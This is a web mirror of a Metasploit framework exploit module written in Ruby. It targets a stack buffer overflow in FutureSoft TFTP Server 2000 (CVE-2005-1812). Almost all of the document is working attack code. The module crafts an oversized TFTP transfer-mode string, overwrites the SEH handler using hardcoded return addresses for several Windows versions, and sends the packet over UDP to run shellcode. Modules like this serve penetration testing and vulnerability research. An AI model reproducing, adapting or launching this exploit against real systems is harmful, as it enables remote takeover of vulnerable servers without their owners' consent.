Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/tftp/futuresoft_transfermode.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Udp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the FutureSoft TFTP Server

19
          2000 product. By sending an overly long transfer-mode string, we were able

20
          to overwrite both the SEH and the saved EIP. A subsequent write-exception

21
          that will occur allows the transferring of execution to our shellcode

22
          via the overwritten SEH. This module has been tested against Windows

23
          2000 Professional and for some reason does not seem to work against

24
          Windows 2000 Server (could not trigger the overflow at all).

25
        },

26
        'Author' => 'MC',

27
        'References' => [

28
          ['CVE', '2005-1812'],

29
          ['OSVDB', '16954'],

30
          ['BID', '13821']

31


32
        ],

33
        'DefaultOptions' => {

34
          'EXITFUNC' => 'process',

35
        },

36
        'Payload' => {

37
          'Space' => 350,

38
          'BadChars' => "\x00",

39
          'StackAdjustment' => -3500,

40
        },

41
        'Platform' => 'win',

42
        'Targets' => [

43
          ['Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ], # ws2help.dll

44
          ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], # ws2help.dll

45
          ['Windows NT SP5/SP6a English', { 'Ret' => 0x776a1799 } ], # ws2help.dll

46
          ['Windows 2003 Server English', { 'Ret' => 0x7ffc0638 } ], # PEB return

47
        ],

48
        'Privileged' => true,

49
        'DisclosureDate' => '2005-05-31',

50
        'Notes' => {

51
          'Reliability' => UNKNOWN_RELIABILITY,

52
          'Stability' => UNKNOWN_STABILITY,

53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

54
        }

55
      )

56
    )

57


58
    register_options(

59
      [

60
        Opt::RPORT(69)

61
      ]

62
    )

63
  end

64


65
  def exploit

66
    connect_udp

67


68
    print_status("Trying target #{target.name}...")

69


70
    sploit = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"

71
    sploit += rand_text_english(167, payload_badchars)

72
    seh = generate_seh_payload(target.ret)

73
    sploit[157, seh.length] = seh

74
    sploit += "\x00"

75


76
    udp_sock.put(sploit)

77


78
    handler

79
    disconnect_udp

80
  end

81
end

82


83